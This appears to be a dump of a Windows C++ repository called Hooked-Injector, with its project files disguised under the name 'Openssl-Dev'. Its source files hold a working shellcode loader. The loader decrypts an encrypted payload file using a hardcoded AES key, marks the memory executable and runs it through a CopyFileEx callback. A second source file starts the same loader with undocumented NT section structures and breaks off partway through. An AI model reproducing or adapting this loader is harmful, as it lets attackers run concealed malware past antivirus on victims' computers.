├── Openssl-Dev
├── holyshit
├── terminator2.raw.ramon
├── Openssl-Dev.rc
├── resource.h
├── Openssl-Dev.vcxproj.filters
├── Sourcefuncional.cpp
├── Openssl-Dev.vcxproj
└── Source.cpp
├── kaka.raw
├── Openssl-Dev.exe
├── kaka.raw.ramon
├── payload.raw.ramon
├── Hooked-Injector.7z
├── terminator.raw.ramon
├── CppProperties.json
├── Openssl-Dev.sln
├── .gitattributes
└── .gitignore
/Openssl-Dev/holyshit:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/Openssl-Dev/terminator2.raw.ramon:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/kaka.raw:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/waawaa/Hooked-Injector/HEAD/kaka.raw
--------------------------------------------------------------------------------
/Openssl-Dev.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/waawaa/Hooked-Injector/HEAD/Openssl-Dev.exe
--------------------------------------------------------------------------------
/kaka.raw.ramon:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/waawaa/Hooked-Injector/HEAD/kaka.raw.ramon
--------------------------------------------------------------------------------
/payload.raw.ramon:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/waawaa/Hooked-Injector/HEAD/payload.raw.ramon
--------------------------------------------------------------------------------
/Hooked-Injector.7z:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/waawaa/Hooked-Injector/HEAD/Hooked-Injector.7z
--------------------------------------------------------------------------------
/terminator.raw.ramon:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/waawaa/Hooked-Injector/HEAD/terminator.raw.ramon
--------------------------------------------------------------------------------
/Openssl-Dev/Openssl-Dev.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/waawaa/Hooked-Injector/HEAD/Openssl-Dev/Openssl-Dev.rc
--------------------------------------------------------------------------------
/CppProperties.json:
--------------------------------------------------------------------------------
1 | {
2 | "configurations": [
3 | {
4 | "inheritEnvironments": [
5 | "msvc_x64"
6 | ],
7 | "name": "x64-Release",
8 | "includePath": [
9 | "${env.INCLUDE}",
10 | "${workspaceRoot}\\**"
11 | ],
12 | "defines": [
13 | "WIN32",
14 | "NDEBUG",
15 | "UNICODE",
16 | "_UNICODE"
17 | ],
18 | "intelliSenseMode": "windows-msvc-x64"
19 | }
20 | ]
21 | }
--------------------------------------------------------------------------------
/Openssl-Dev/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by Openssl-Dev.rc
4 | //
5 | #define IDR_HTML1 101
6 |
7 | // Next default values for new objects
8 | //
9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE 102
12 | #define _APS_NEXT_COMMAND_VALUE 40001
13 | #define _APS_NEXT_CONTROL_VALUE 1001
14 | #define _APS_NEXT_SYMED_VALUE 101
15 | #endif
16 | #endif
17 |
--------------------------------------------------------------------------------
/Openssl-Dev/Openssl-Dev.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Archivos de origen
20 |
21 |
22 |
23 |
24 | Archivos de encabezado
25 |
26 |
27 |
28 |
29 | Archivos de recursos
30 |
31 |
32 |
33 |
34 |
35 |
--------------------------------------------------------------------------------
/Openssl-Dev.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.29519.87
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Openssl-Dev", "Openssl-Dev\Openssl-Dev.vcxproj", "{CAD458F3-22A8-4679-AB61-2569DA5FF6EF}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {CAD458F3-22A8-4679-AB61-2569DA5FF6EF}.Debug|x64.ActiveCfg = Debug|x64
17 | {CAD458F3-22A8-4679-AB61-2569DA5FF6EF}.Debug|x64.Build.0 = Debug|x64
18 | {CAD458F3-22A8-4679-AB61-2569DA5FF6EF}.Debug|x86.ActiveCfg = Debug|Win32
19 | {CAD458F3-22A8-4679-AB61-2569DA5FF6EF}.Debug|x86.Build.0 = Debug|Win32
20 | {CAD458F3-22A8-4679-AB61-2569DA5FF6EF}.Release|x64.ActiveCfg = Release|x64
21 | {CAD458F3-22A8-4679-AB61-2569DA5FF6EF}.Release|x64.Build.0 = Release|x64
22 | {CAD458F3-22A8-4679-AB61-2569DA5FF6EF}.Release|x86.ActiveCfg = Release|Win32
23 | {CAD458F3-22A8-4679-AB61-2569DA5FF6EF}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {243E9A30-A216-4FCF-8C4E-6B55B329AC50}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/.gitattributes:
--------------------------------------------------------------------------------
1 | ###############################################################################
2 | # Set default behavior to automatically normalize line endings.
3 | ###############################################################################
4 | * text=auto
5 |
6 | ###############################################################################
7 | # Set default behavior for command prompt diff.
8 | #
9 | # This is need for earlier builds of msysgit that does not have it on by
10 | # default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs diff=csharp
14 |
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln merge=binary
26 | #*.csproj merge=binary
27 | #*.vbproj merge=binary
28 | #*.vcxproj merge=binary
29 | #*.vcproj merge=binary
30 | #*.dbproj merge=binary
31 | #*.fsproj merge=binary
32 | #*.lsproj merge=binary
33 | #*.wixproj merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj merge=binary
36 | #*.wwaproj merge=binary
37 |
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg binary
44 | #*.png binary
45 | #*.gif binary
46 |
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | #
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the
52 | # entries below.
53 | ###############################################################################
54 | #*.doc diff=astextplain
55 | #*.DOC diff=astextplain
56 | #*.docx diff=astextplain
57 | #*.DOCX diff=astextplain
58 | #*.dot diff=astextplain
59 | #*.DOT diff=astextplain
60 | #*.pdf diff=astextplain
61 | #*.PDF diff=astextplain
62 | #*.rtf diff=astextplain
63 | #*.RTF diff=astextplain
64 |
--------------------------------------------------------------------------------
/Openssl-Dev/Sourcefuncional.cpp:
--------------------------------------------------------------------------------
1 | #define _CRT_SECURE_NO_WARNINGS
2 | #include
3 |
4 | #include
5 | #include
6 | #include
7 | #include
8 | #include
9 |
10 |
11 | #pragma comment(lib, "advapi32.lib")
12 | #pragma comment(lib, "crypt32.lib")
13 |
14 |
15 |
16 | using namespace std;
17 |
18 |
19 | const char* extension = ".ramon";
20 | #define AES_KEY_SIZE 16
21 | #define CHUNK_SIZE (AES_KEY_SIZE*5)
22 | char * encrypter_111(const char* path, BOOL isDecrypt, LPDWORD bytes, BOOL calculate) //std::string data)
23 | {
24 | if (strlen(path) > MAX_PATH)
25 | return 0;
26 | char filename[266];
27 | char filename2[260 + 6];
28 | if (!isDecrypt)
29 | {
30 |
31 | strcpy_s(filename, 266, path);
32 | strcpy_s(filename2, 266, path);
33 | strcat_s(filename2, 266, extension);
34 |
35 | }
36 | else
37 | {
38 | strcpy_s(filename, 266, path);
39 | }
40 |
41 |
42 |
43 | wchar_t default_key[] = L"7fwivcli7r#auzS";
44 | wchar_t* key_str = default_key;
45 |
46 | size_t len = lstrlenW(key_str);
47 |
48 |
49 | HANDLE hInpFile = CreateFileA(filename, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_FLAG_SEQUENTIAL_SCAN, NULL);
50 | if (hInpFile == INVALID_HANDLE_VALUE) {
51 | printf("Cannot open input file!\n");
52 | system("pause");
53 | return 0;
54 | }
55 |
56 | /*HANDLE hOutFile = CreateFileA(filename2, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
57 | if (hOutFile == INVALID_HANDLE_VALUE) {
58 | printf("Cannot open output file!\n");
59 | system("pause");
60 | return 0;
61 | }*/
62 |
63 |
64 |
65 | DWORD dwStatus = 0;
66 | BOOL bResult = FALSE;
67 | wchar_t info[] = L"Microsoft Enhanced RSA and AES Cryptographic Provider";
68 | HCRYPTPROV hProv;
69 | BYTE pbBuffer[32];
70 |
71 | if (!CryptAcquireContextW(&hProv, NULL, info, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
72 | dwStatus = GetLastError();
73 | printf("CryptAcquireContext failed: %x\n", dwStatus);
74 | CryptReleaseContext(hProv, 0);
75 | system("pause");
76 | return 0;
77 | }
78 |
79 |
80 |
81 | HCRYPTHASH hHash;
82 | if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
83 | dwStatus = GetLastError();
84 | printf("CryptCreateHash failed: %x\n", dwStatus);
85 | CryptReleaseContext(hProv, 0);
86 | system("pause");
87 | return 0;
88 | }
89 |
90 | if (!CryptHashData(hHash, (BYTE*)key_str, len, 0)) {
91 | DWORD err = GetLastError();
92 | printf("CryptHashData Failed : %#x\n", err);
93 | system("pause");
94 | return 0;
95 | }
96 |
97 | HCRYPTKEY hKey;
98 | if (!CryptDeriveKey(hProv, CALG_AES_128, hHash, 0, &hKey)) {
99 | dwStatus = GetLastError();
100 | printf("CryptDeriveKey failed: %x\n", dwStatus);
101 | CryptReleaseContext(hProv, 0);
102 | system("pause");
103 | return 0;
104 | }
105 |
106 |
107 | const size_t chunk_size = CHUNK_SIZE;
108 | BYTE chunk[chunk_size] = { 0 };
109 | DWORD out_len = 0;
110 |
111 | BOOL isFinal = FALSE;
112 | DWORD readTotalSize = 0;
113 | DWORD inputSize = GetFileSize(hInpFile, NULL);
114 | *bytes = inputSize;
115 | if (calculate == TRUE)
116 | {
117 |
118 | CryptReleaseContext(hProv, 0);
119 | CryptDestroyKey(hKey);
120 | CryptDestroyHash(hHash);
121 | //memset(random, '\0', 16);
122 | CloseHandle(hInpFile);
123 | /*if (!isDecrypt)
124 | CloseHandle(hOutFile);*/
125 | return 0;
126 | }
127 |
128 | char* kaka = (char*)malloc(inputSize+1);
129 | if (!kaka)
130 | return 0;
131 | int i = 0;
132 | while (bResult = ReadFile(hInpFile, chunk, chunk_size, &out_len, NULL)) {
133 | if (0 == out_len) {
134 | break;
135 | }
136 | readTotalSize += out_len;
137 | if (readTotalSize == inputSize) {
138 | isFinal = TRUE;
139 | }
140 |
141 | if (isDecrypt) {
142 | if (!CryptDecrypt(hKey, NULL, isFinal, 0, chunk, &out_len)) {
143 | printf("[-] CryptDecrypt failed error: 0x%x\n", GetLastError());
144 | break;
145 | }
146 | }
147 | else {
148 | if (!CryptEncrypt(hKey, NULL, isFinal, 0, chunk, &out_len, chunk_size)) {
149 | printf("[-] CryptEncrypt failed\n");
150 | break;
151 | }
152 | }
153 | DWORD written = 0;
154 |
155 | if (i != 0)
156 | memcpy(kaka + 80*i, chunk, out_len);
157 | else
158 | {
159 | memcpy(kaka, chunk, out_len);
160 |
161 | }
162 | i++;
163 |
164 | /*if (!isDecrypt)
165 | {
166 | if (!WriteFile(hOutFile, chunk, out_len, &written, NULL)) {
167 | printf("writing failed!\n");
168 | break;
169 | }
170 | }*/
171 | memset(chunk, 0, chunk_size);
172 | }
173 | *bytes = inputSize;
174 | CryptReleaseContext(hProv, 0);
175 | CryptDestroyKey(hKey);
176 | CryptDestroyHash(hHash);
177 | //memset(random, '\0', 16);
178 | CloseHandle(hInpFile);
179 | /*if (!isDecrypt)
180 | CloseHandle(hOutFile);
181 | if (isDecrypt == FALSE)
182 | {
183 | HANDLE hInpFile = CreateFileA(filename, GENERIC_READ, FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_FLAG_SEQUENTIAL_SCAN, NULL);
184 | CloseHandle(hInpFile);
185 | }*/
186 |
187 |
188 | return kaka;
189 |
190 |
191 |
192 |
193 |
194 | }
195 |
196 |
197 |
198 |
199 |
200 | int main() {
201 |
202 | static DWORD size = NULL;
203 | encrypter_111("terminator.raw.ramon", true, &size, true);
204 | char* lloc = (char*)malloc(size);
205 | memcpy(lloc, encrypter_111("terminator.raw.ramon", true, &size, false), size);
206 | DWORD fold = NULL, old = NULL;
207 |
208 |
209 |
210 |
211 |
212 | DWORD dold=NULL;
213 |
214 | if (!VirtualProtect(lloc, size, PAGE_EXECUTE_READWRITE, &dold))
215 | return 0;
216 |
217 | if (!CopyFileEx("terminator.raw.ramon", "terminator.raw.ramon", (LPPROGRESS_ROUTINE)lloc, NULL, FALSE, 0))
218 | printf("Error: %d\n", GetLastError());
219 |
220 |
221 |
222 |
223 |
224 | }
--------------------------------------------------------------------------------
/Openssl-Dev/Openssl-Dev.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | {CAD458F3-22A8-4679-AB61-2569DA5FF6EF}
24 | OpensslDev
25 | 10.0
26 |
27 |
28 |
29 | Application
30 | true
31 | v142
32 | MultiByte
33 | false
34 |
35 |
36 | Application
37 | false
38 | v142
39 | true
40 | MultiByte
41 |
42 |
43 | Application
44 | true
45 | v142
46 | MultiByte
47 | false
48 |
49 |
50 | Application
51 | false
52 | v142
53 | true
54 | MultiByte
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 | C:\Program Files\OpenSSL-Win64\include;$(IncludePath)
76 |
77 |
78 | C:\Program Files\OpenSSL-Win64\;$(ExecutablePath)
79 | C:\Program Files\OpenSSL-Win64\include;$(IncludePath)
80 |
81 |
82 |
83 | Level3
84 | Disabled
85 | true
86 | true
87 |
88 |
89 | Console
90 |
91 |
92 |
93 |
94 | Level3
95 | Disabled
96 | true
97 | true
98 | MultiThreadedDebug
99 |
100 |
101 | Console
102 |
103 |
104 |
105 |
106 | Level3
107 | MaxSpeed
108 | true
109 | true
110 | true
111 | true
112 | true
113 |
114 |
115 | Console
116 | true
117 | true
118 |
119 |
120 |
121 |
122 | Level3
123 | MaxSpeed
124 | true
125 | true
126 | true
127 | true
128 | false
129 | /MT %(AdditionalOptions)
130 |
131 |
132 | Console
133 | true
134 | true
135 | false
136 |
137 |
138 |
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Mono auto generated files
17 | mono_crash.*
18 |
19 | # Build results
20 | [Dd]ebug/
21 | [Dd]ebugPublic/
22 | [Rr]elease/
23 | [Rr]eleases/
24 | x64/
25 | x86/
26 | [Ww][Ii][Nn]32/
27 | [Aa][Rr][Mm]/
28 | [Aa][Rr][Mm]64/
29 | bld/
30 | [Bb]in/
31 | [Oo]bj/
32 | [Oo]ut/
33 | [Ll]og/
34 | [Ll]ogs/
35 |
36 | # Visual Studio 2015/2017 cache/options directory
37 | .vs/
38 | # Uncomment if you have tasks that create the project's static files in wwwroot
39 | #wwwroot/
40 |
41 | # Visual Studio 2017 auto generated files
42 | Generated\ Files/
43 |
44 | # MSTest test Results
45 | [Tt]est[Rr]esult*/
46 | [Bb]uild[Ll]og.*
47 |
48 | # NUnit
49 | *.VisualState.xml
50 | TestResult.xml
51 | nunit-*.xml
52 |
53 | # Build Results of an ATL Project
54 | [Dd]ebugPS/
55 | [Rr]eleasePS/
56 | dlldata.c
57 |
58 | # Benchmark Results
59 | BenchmarkDotNet.Artifacts/
60 |
61 | # .NET Core
62 | project.lock.json
63 | project.fragment.lock.json
64 | artifacts/
65 |
66 | # ASP.NET Scaffolding
67 | ScaffoldingReadMe.txt
68 |
69 | # StyleCop
70 | StyleCopReport.xml
71 |
72 | # Files built by Visual Studio
73 | *_i.c
74 | *_p.c
75 | *_h.h
76 | *.ilk
77 | *.meta
78 | *.obj
79 | *.iobj
80 | *.pch
81 | *.pdb
82 | *.ipdb
83 | *.pgc
84 | *.pgd
85 | *.rsp
86 | *.sbr
87 | *.tlb
88 | *.tli
89 | *.tlh
90 | *.tmp
91 | *.tmp_proj
92 | *_wpftmp.csproj
93 | *.log
94 | *.vspscc
95 | *.vssscc
96 | .builds
97 | *.pidb
98 | *.svclog
99 | *.scc
100 |
101 | # Chutzpah Test files
102 | _Chutzpah*
103 |
104 | # Visual C++ cache files
105 | ipch/
106 | *.aps
107 | *.ncb
108 | *.opendb
109 | *.opensdf
110 | *.sdf
111 | *.cachefile
112 | *.VC.db
113 | *.VC.VC.opendb
114 |
115 | # Visual Studio profiler
116 | *.psess
117 | *.vsp
118 | *.vspx
119 | *.sap
120 |
121 | # Visual Studio Trace Files
122 | *.e2e
123 |
124 | # TFS 2012 Local Workspace
125 | $tf/
126 |
127 | # Guidance Automation Toolkit
128 | *.gpState
129 |
130 | # ReSharper is a .NET coding add-in
131 | _ReSharper*/
132 | *.[Rr]e[Ss]harper
133 | *.DotSettings.user
134 |
135 | # TeamCity is a build add-in
136 | _TeamCity*
137 |
138 | # DotCover is a Code Coverage Tool
139 | *.dotCover
140 |
141 | # AxoCover is a Code Coverage Tool
142 | .axoCover/*
143 | !.axoCover/settings.json
144 |
145 | # Coverlet is a free, cross platform Code Coverage Tool
146 | coverage*.json
147 | coverage*.xml
148 | coverage*.info
149 |
150 | # Visual Studio code coverage results
151 | *.coverage
152 | *.coveragexml
153 |
154 | # NCrunch
155 | _NCrunch_*
156 | .*crunch*.local.xml
157 | nCrunchTemp_*
158 |
159 | # MightyMoose
160 | *.mm.*
161 | AutoTest.Net/
162 |
163 | # Web workbench (sass)
164 | .sass-cache/
165 |
166 | # Installshield output folder
167 | [Ee]xpress/
168 |
169 | # DocProject is a documentation generator add-in
170 | DocProject/buildhelp/
171 | DocProject/Help/*.HxT
172 | DocProject/Help/*.HxC
173 | DocProject/Help/*.hhc
174 | DocProject/Help/*.hhk
175 | DocProject/Help/*.hhp
176 | DocProject/Help/Html2
177 | DocProject/Help/html
178 |
179 | # Click-Once directory
180 | publish/
181 |
182 | # Publish Web Output
183 | *.[Pp]ublish.xml
184 | *.azurePubxml
185 | # Note: Comment the next line if you want to checkin your web deploy settings,
186 | # but database connection strings (with potential passwords) will be unencrypted
187 | *.pubxml
188 | *.publishproj
189 |
190 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
191 | # checkin your Azure Web App publish settings, but sensitive information contained
192 | # in these scripts will be unencrypted
193 | PublishScripts/
194 |
195 | # NuGet Packages
196 | *.nupkg
197 | # NuGet Symbol Packages
198 | *.snupkg
199 | # The packages folder can be ignored because of Package Restore
200 | **/[Pp]ackages/*
201 | # except build/, which is used as an MSBuild target.
202 | !**/[Pp]ackages/build/
203 | # Uncomment if necessary however generally it will be regenerated when needed
204 | #!**/[Pp]ackages/repositories.config
205 | # NuGet v3's project.json files produces more ignorable files
206 | *.nuget.props
207 | *.nuget.targets
208 |
209 | # Microsoft Azure Build Output
210 | csx/
211 | *.build.csdef
212 |
213 | # Microsoft Azure Emulator
214 | ecf/
215 | rcf/
216 |
217 | # Windows Store app package directories and files
218 | AppPackages/
219 | BundleArtifacts/
220 | Package.StoreAssociation.xml
221 | _pkginfo.txt
222 | *.appx
223 | *.appxbundle
224 | *.appxupload
225 |
226 | # Visual Studio cache files
227 | # files ending in .cache can be ignored
228 | *.[Cc]ache
229 | # but keep track of directories ending in .cache
230 | !?*.[Cc]ache/
231 |
232 | # Others
233 | ClientBin/
234 | ~$*
235 | *~
236 | *.dbmdl
237 | *.dbproj.schemaview
238 | *.jfm
239 | *.pfx
240 | *.publishsettings
241 | orleans.codegen.cs
242 |
243 | # Including strong name files can present a security risk
244 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
245 | #*.snk
246 |
247 | # Since there are multiple workflows, uncomment next line to ignore bower_components
248 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
249 | #bower_components/
250 |
251 | # RIA/Silverlight projects
252 | Generated_Code/
253 |
254 | # Backup & report files from converting an old project file
255 | # to a newer Visual Studio version. Backup files are not needed,
256 | # because we have git ;-)
257 | _UpgradeReport_Files/
258 | Backup*/
259 | UpgradeLog*.XML
260 | UpgradeLog*.htm
261 | ServiceFabricBackup/
262 | *.rptproj.bak
263 |
264 | # SQL Server files
265 | *.mdf
266 | *.ldf
267 | *.ndf
268 |
269 | # Business Intelligence projects
270 | *.rdl.data
271 | *.bim.layout
272 | *.bim_*.settings
273 | *.rptproj.rsuser
274 | *- [Bb]ackup.rdl
275 | *- [Bb]ackup ([0-9]).rdl
276 | *- [Bb]ackup ([0-9][0-9]).rdl
277 |
278 | # Microsoft Fakes
279 | FakesAssemblies/
280 |
281 | # GhostDoc plugin setting file
282 | *.GhostDoc.xml
283 |
284 | # Node.js Tools for Visual Studio
285 | .ntvs_analysis.dat
286 | node_modules/
287 |
288 | # Visual Studio 6 build log
289 | *.plg
290 |
291 | # Visual Studio 6 workspace options file
292 | *.opt
293 |
294 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
295 | *.vbw
296 |
297 | # Visual Studio LightSwitch build output
298 | **/*.HTMLClient/GeneratedArtifacts
299 | **/*.DesktopClient/GeneratedArtifacts
300 | **/*.DesktopClient/ModelManifest.xml
301 | **/*.Server/GeneratedArtifacts
302 | **/*.Server/ModelManifest.xml
303 | _Pvt_Extensions
304 |
305 | # Paket dependency manager
306 | .paket/paket.exe
307 | paket-files/
308 |
309 | # FAKE - F# Make
310 | .fake/
311 |
312 | # CodeRush personal settings
313 | .cr/personal
314 |
315 | # Python Tools for Visual Studio (PTVS)
316 | __pycache__/
317 | *.pyc
318 |
319 | # Cake - Uncomment if you are using it
320 | # tools/**
321 | # !tools/packages.config
322 |
323 | # Tabs Studio
324 | *.tss
325 |
326 | # Telerik's JustMock configuration file
327 | *.jmconfig
328 |
329 | # BizTalk build output
330 | *.btp.cs
331 | *.btm.cs
332 | *.odx.cs
333 | *.xsd.cs
334 |
335 | # OpenCover UI analysis results
336 | OpenCover/
337 |
338 | # Azure Stream Analytics local run output
339 | ASALocalRun/
340 |
341 | # MSBuild Binary and Structured Log
342 | *.binlog
343 |
344 | # NVidia Nsight GPU debugger configuration file
345 | *.nvuser
346 |
347 | # MFractors (Xamarin productivity tool) working folder
348 | .mfractor/
349 |
350 | # Local History for Visual Studio
351 | .localhistory/
352 |
353 | # BeatPulse healthcheck temp database
354 | healthchecksdb
355 |
356 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
357 | MigrationBackup/
358 |
359 | # Ionide (cross platform F# VS Code tools) working folder
360 | .ionide/
361 |
362 | # Fody - auto-generated XML schema
363 | FodyWeavers.xsd
--------------------------------------------------------------------------------
/Openssl-Dev/Source.cpp:
--------------------------------------------------------------------------------
1 | #define _CRT_SECURE_NO_WARNINGS
2 | #define _MT
3 | #include
4 |
5 | #include
6 | #include
7 | #include
8 | #include
9 | #include
10 | #include
11 | #include
12 | #include
13 | #include
14 |
15 | #pragma comment(lib,"ntdll.lib")
16 | #pragma comment(lib, "advapi32.lib")
17 | #pragma comment(lib, "crypt32.lib")
18 |
19 | #ifndef NT_SUCCESS
20 | #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
21 | #endif
22 |
23 | using namespace std;
24 |
25 |
26 | const char* extension = ".ramon";
27 | #define AES_KEY_SIZE 16
28 | #define CHUNK_SIZE (AES_KEY_SIZE*5)
29 | void* offset;
30 | size_t size_offset;
31 |
32 | typedef struct _SECTION_BASIC_INFORMATION {
33 | PVOID Base;
34 | ULONG Attributes;
35 | LARGE_INTEGER Size;
36 | } SECTION_BASIC_INFORMATION, * PSECTION_BASIC_INFORMATION;
37 |
38 | // http://undocumented.ntinternals.net/source/usermode/structures/section_image_information.html
39 | typedef struct _SECTION_IMAGE_INFORMATION {
40 | PVOID EntryPoint;
41 | ULONG StackZeroBits;
42 | ULONG StackReserved;
43 | ULONG StackCommit;
44 | ULONG ImageSubsystem;
45 | WORD SubSystemVersionLow;
46 | WORD SubSystemVersionHigh;
47 | ULONG Unknown1;
48 | ULONG ImageCharacteristics;
49 | ULONG ImageMachineType;
50 | ULONG Unknown2[3];
51 | } SECTION_IMAGE_INFORMATION, * PSECTION_IMAGE_INFORMATION;
52 |
53 |
54 | typedef enum _SECTION_INFORMATION_CLASS {
55 | SectionBasicInformation,
56 | SectionImageInformation
57 | } SECTION_INFORMATION_CLASS, * PSECTION_INFORMATION_CLASS;
58 |
59 | typedef NTSYSAPI NTSTATUS NTAPI NtQuerySection(
60 |
61 |
62 |
63 | IN HANDLE SectionHandle,
64 | IN SECTION_INFORMATION_CLASS InformationClass,
65 | OUT PVOID InformationBuffer,
66 | IN ULONG InformationBufferSize,
67 | OUT PULONG ResultLength OPTIONAL);
68 |
69 |
70 | char* encrypter_111(const char* path, BOOL isDecrypt, LPDWORD bytes, BOOL calculate)
71 | {
72 | if (strlen(path) > MAX_PATH)
73 | return 0;
74 | char filename[266];
75 | char filename2[260 + 6];
76 | if (!isDecrypt)
77 | {
78 |
79 | strcpy_s(filename, 266, path);
80 | strcpy_s(filename2, 266, path);
81 | strcat_s(filename2, 266, extension);
82 |
83 | }
84 | else
85 | {
86 | strcpy_s(filename, 266, path);
87 | }
88 |
89 |
90 |
91 | wchar_t default_key[] = L"7fwivcli7r#auzS";
92 | wchar_t* key_str = default_key;
93 |
94 | size_t len = lstrlenW(key_str);
95 |
96 |
97 | HANDLE hInpFile = CreateFileA(filename, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_FLAG_SEQUENTIAL_SCAN, NULL);
98 | if (hInpFile == INVALID_HANDLE_VALUE) {
99 |
100 | return 0;
101 | }
102 |
103 | /*HANDLE hOutFile = CreateFileA(filename2, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
104 | if (hOutFile == INVALID_HANDLE_VALUE) {
105 | printf("Cannot open output file!\n");
106 | system("pause");
107 | return 0;
108 | }*/
109 |
110 |
111 |
112 | DWORD dwStatus = 0;
113 | BOOL bResult = FALSE;
114 | wchar_t info[] = L"Microsoft Enhanced RSA and AES Cryptographic Provider";
115 | HCRYPTPROV hProv;
116 |
117 | if (!CryptAcquireContextW(&hProv, NULL, info, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
118 | dwStatus = GetLastError();
119 | return 0;
120 | }
121 |
122 |
123 |
124 | HCRYPTHASH hHash;
125 | if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
126 | dwStatus = GetLastError();
127 |
128 | return 0;
129 | }
130 |
131 | if (!CryptHashData(hHash, (BYTE*)key_str, len, 0)) {
132 | DWORD err = GetLastError();
133 |
134 | return 0;
135 | }
136 |
137 | HCRYPTKEY hKey;
138 | if (!CryptDeriveKey(hProv, CALG_AES_128, hHash, 0, &hKey)) {
139 | dwStatus = GetLastError();
140 |
141 | return 0;
142 | }
143 |
144 |
145 | const size_t chunk_size = CHUNK_SIZE;
146 | BYTE chunk[chunk_size] = { 0 };
147 | DWORD out_len = 0;
148 |
149 | BOOL isFinal = FALSE;
150 | DWORD readTotalSize = 0;
151 | DWORD inputSize = GetFileSize(hInpFile, NULL);
152 | *bytes = inputSize;
153 | if (calculate == TRUE)
154 | {
155 |
156 | CryptReleaseContext(hProv, 0);
157 | CryptDestroyKey(hKey);
158 | CryptDestroyHash(hHash);
159 | //memset(random, '\0', 16);
160 | CloseHandle(hInpFile);
161 | /*if (!isDecrypt)
162 | CloseHandle(hOutFile);*/
163 | return 0;
164 | }
165 |
166 | char* kaka = (char*)malloc(inputSize + 1);
167 | if (!kaka)
